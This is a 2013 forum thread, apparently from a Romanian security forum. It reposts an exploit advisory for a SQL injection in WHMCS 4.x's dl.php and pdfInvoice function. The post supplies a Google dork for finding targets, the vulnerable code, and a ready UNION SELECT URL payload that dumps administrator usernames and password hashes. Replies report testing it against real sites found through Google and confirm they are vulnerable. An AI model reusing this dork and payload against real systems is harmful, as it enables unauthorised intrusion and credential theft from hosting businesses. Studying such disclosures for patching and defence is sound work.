Active Members akkiliON Posted May 16, 2013 Active Members Report Share Posted May 16, 2013 # Title: WHMCS 4.x SQL Injection Vulnerability# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php?"?# Author: Ahmed Aboul-Ela# Contact: Ahmed.Aboul3la[at]gmail[dot]com# Date: 14/5/2013# Vendor: http://www.whmcs.com# Version: 4.5.2 and perior versions should be affected too# Tested on: Linux~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sql Injection Vulnerability in "/includes/invoicefunctions.php"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Vulnerable Code Snippet : LINE 582: function pdfInvoice($id) LINE 583: { LINE 686: if ($CONFIG['GroupSimilarLineItems']) LINE 687: { LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC'); LINE 689: } As we can see here the $id argument of pdfInvoice function have been used directly at mysql query without any sanitization which leads directly to Sql Injection It appears that pdfInvoice function is being called at "/dl.php" file as the following: LINE 21: if ($type == 'i') LINE 22: { LINE 23: $result = select_query('tblinvoices', '', array( LINE 24: 'id' => $id LINE 25: )); LINE 26: $data = mysql_fetch_array($result); LINE 27: $invoiceid = $data['id']; LINE 28: $invoicenum = $data['invoicenum']; LINE 29: $userid = $data['userid']; LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid)) LINE 31: { LINE 32: downloadLogin(); LINE 33: } LINE 34: if (!$invoicenum) LINE 35: { LINE 36: $invoicenum = $invoiceid; LINE 37: } LINE 38: require('includes/clientfunctions.php'); LINE 39: require('includes/countries.php'); LINE 40: require('includes/invoicefunctions.php'); LINE 41: require('includes/tcpdf.php'); LINE 42: $pdfdata = pdfInvoice($id); LINE 43: header('Pragma: public'); LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT'); LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT'); LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private'); LINE 47: header('Cache-Control: private', false); LINE 48: header('Content-Type: application/octet-stream'); LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"'); LINE 50: header('Content-Transfer-Encoding: binary'); LINE 51: echo $pdfdata; LINE 52: exit(); LINE 53: return 1; LINE 54: } As we can see at LINE "42" the pdfInvoice function have been called and passed $id Variable without any sanitization Afterwards it force the browser to download the generated invoice in PDF format - Proof of Concept for Exploitation To Dump Administrator Credentials (user & pass): http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins -- ~ Result: The Browser will prompt download for the pdf invoice file after opening it you should find the username and pw hash there - Precondition to Successfully Exploit the Vulnerability: "Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default ) - Credits: Ahmed Aboul-Ela - Information Security Consultant @ Starware GroupWHMCS 4.x (invoicefunctions.php, id param) - SQL Injection Vulnerability Quote Link to comment Share on other sites More sharing options...
UnixDevel Posted May 17, 2013 Report Share Posted May 17, 2013 oo nice ...am testat ceva siteuri de pe google si pot confirma ca sutn vulnerabile Quote Link to comment Share on other sites More sharing options...
mad93 Posted May 18, 2013 Report Share Posted May 18, 2013 da sunt si cateva romanesti Quote Link to comment Share on other sites More sharing options...
RoEx Posted May 18, 2013 Report Share Posted May 18, 2013 eu am gasit doar pdf-uri goale de dld Quote Link to comment Share on other sites More sharing options...
